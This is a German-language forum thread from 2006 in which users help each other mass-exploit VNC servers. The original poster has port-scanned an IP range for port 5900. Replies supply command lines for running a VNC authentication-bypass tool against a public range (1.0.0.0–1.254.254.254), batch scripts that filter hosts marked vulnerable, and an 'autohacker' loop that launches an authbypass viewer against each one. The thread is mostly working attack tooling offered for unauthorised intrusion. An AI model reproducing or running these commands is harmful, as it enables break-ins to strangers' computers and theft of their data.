VNC IP liste "testen"

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von MasterJulian, 19. August 2006 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 19. August 2006
    Ich hab folgendes Problem:
    Ich habe mit Dfind eine range nach port 5900 abgesucht. Jedoch ist nicht jeder VNC Vuln. Ich wollt daher fragen, obs ne möglichkeit gibt, die liste in ein programm zu laden und zu checken. Wenn nicht müsste man ein script basteln das sowas macht:
    VNC_bypauth.exe -i %IP% -p 5900 -vnc und dan immer %IP% mit der IP ersetzten. Sollte mit VB realsierbar sein. Aber bevor ich mir die mühe machen, wollte ich fragen, obs auch anders geht.

    PS: ja ich weis ich hätte die range gleich mit dem Scanner scannen sollen :p
     

  2. Anzeige
  3. #2 19. August 2006
    RE: VNC IP liste "testen"

    Download offline!/

    pw: 4rr

    Code:
    SITE EXEC vnc_Bypauth.exe -p 5900 -i 1.0.0.0-1.254.254.254 -vnc -T 2000 -tc 700
    Code:
    @echo off
    type vnc_bypauth.txt | grep VULNERABLE | awk "{print $1}" > vulns.txt
    Kein Feedback!
     
  4. #3 20. August 2006
    das hier is au noch nett, wenn du dann nich jede einzelne ip in das programm zum "hacken" kopieren willst
    [HIDE]
    Code:
    @echo off
    for /F %%a in (result.txt) do (05162006-BL4CK-vncviewer-authbypass.exe %%a)
    [/HIDE]

    ps: für die exe da oben... da gibts mehrere arten, wie man damit scannen kann

    und zum rausfiltern der vuln ips kannst das au so machen

    [HIDE]
    Code:
    @echo off
    findstr /E "vnc4:VULNERABLE" VNC_bypauth.txt > results.txt
    [/HIDE]
     
  5. #4 20. August 2006
    Ich meine das anders. Ich habe jetzt so eine liste:
    0.0.0.0 Port:5900 listening
    0.0.0.1 Port:5900 listening
    etc
    Da ich das mit einem ganz normalen Portscanner gescannt habe. Jetzt möchte ich das aber so haben:
    VNC_bypauth.exe -i 0.0.0.0 -p 5900 -vnc
    VNC_bypauth.exe -i 0.0.0.1 -p 5900 -vnc
    etc

    Die Log kann ich nacher selber filtern. Jetzt wollte ich fragen, ob es ein Tool/script gibt, das genau sowas macht, oder ob ich das in VB selber schreiben muss
     
  6. #5 20. August 2006
    @ Halloweenracer

    wo muss ich das denn eingeben?

    und der testet dan die VULNERABLE ob man die benutzen kann oder wie?
     
  7. #6 20. August 2006
    SPAM deleted und Bedankomat geadded ;)

    mfg KillerKarnickel
     
  8. #7 20. August 2006
    hoi,

    also denn schmeiß die liste mit den ips weg und scanne mit dem tool von oben... alles andere hat keinen sinn ;)

    denn du kannst die nich nach vuln checken lassen mit dem tool... damit musst eben richtig scannen ;)

    und was sagt uns das? erst kundig machen und nicht gleich drauf losmachen...

    ----------------------

    das, was ich geschrieben habe... das machst du in ne txt datei und benennst die dann um in atohack.bat und das andere in vuln.bat

    name is an sich total egal

    mfg

    //

    ps:

    also nomal ganz im detail^^



    das hier in ne txt datei und die dann als autohacker.bat umbenennen^^
    Code:
    @echo off
    findstr /E "vnc4:VULNERABLE" VNC_bypauth.txt > results.txt
    das is ne txt und dann als vulnfilter.bat umbenennen^^

    //

    hab die in ne zip gemacht^^

    Download offline!/
     

  9. Videos zum Thema
Die Seite wird geladen...
Similar Threads - VNC liste testen
  1. Antworten:
    3
    Aufrufe:
    972
  2. Antworten:
    0
    Aufrufe:
    743
  3. UVNC - PcHelpWare

    Blackb!rd , 14. November 2011 , im Forum: Netzwerk, Telefon, Internet
    Antworten:
    4
    Aufrufe:
    723
  4. Antworten:
    5
    Aufrufe:
    2.273
  5. Antworten:
    2
    Aufrufe:
    915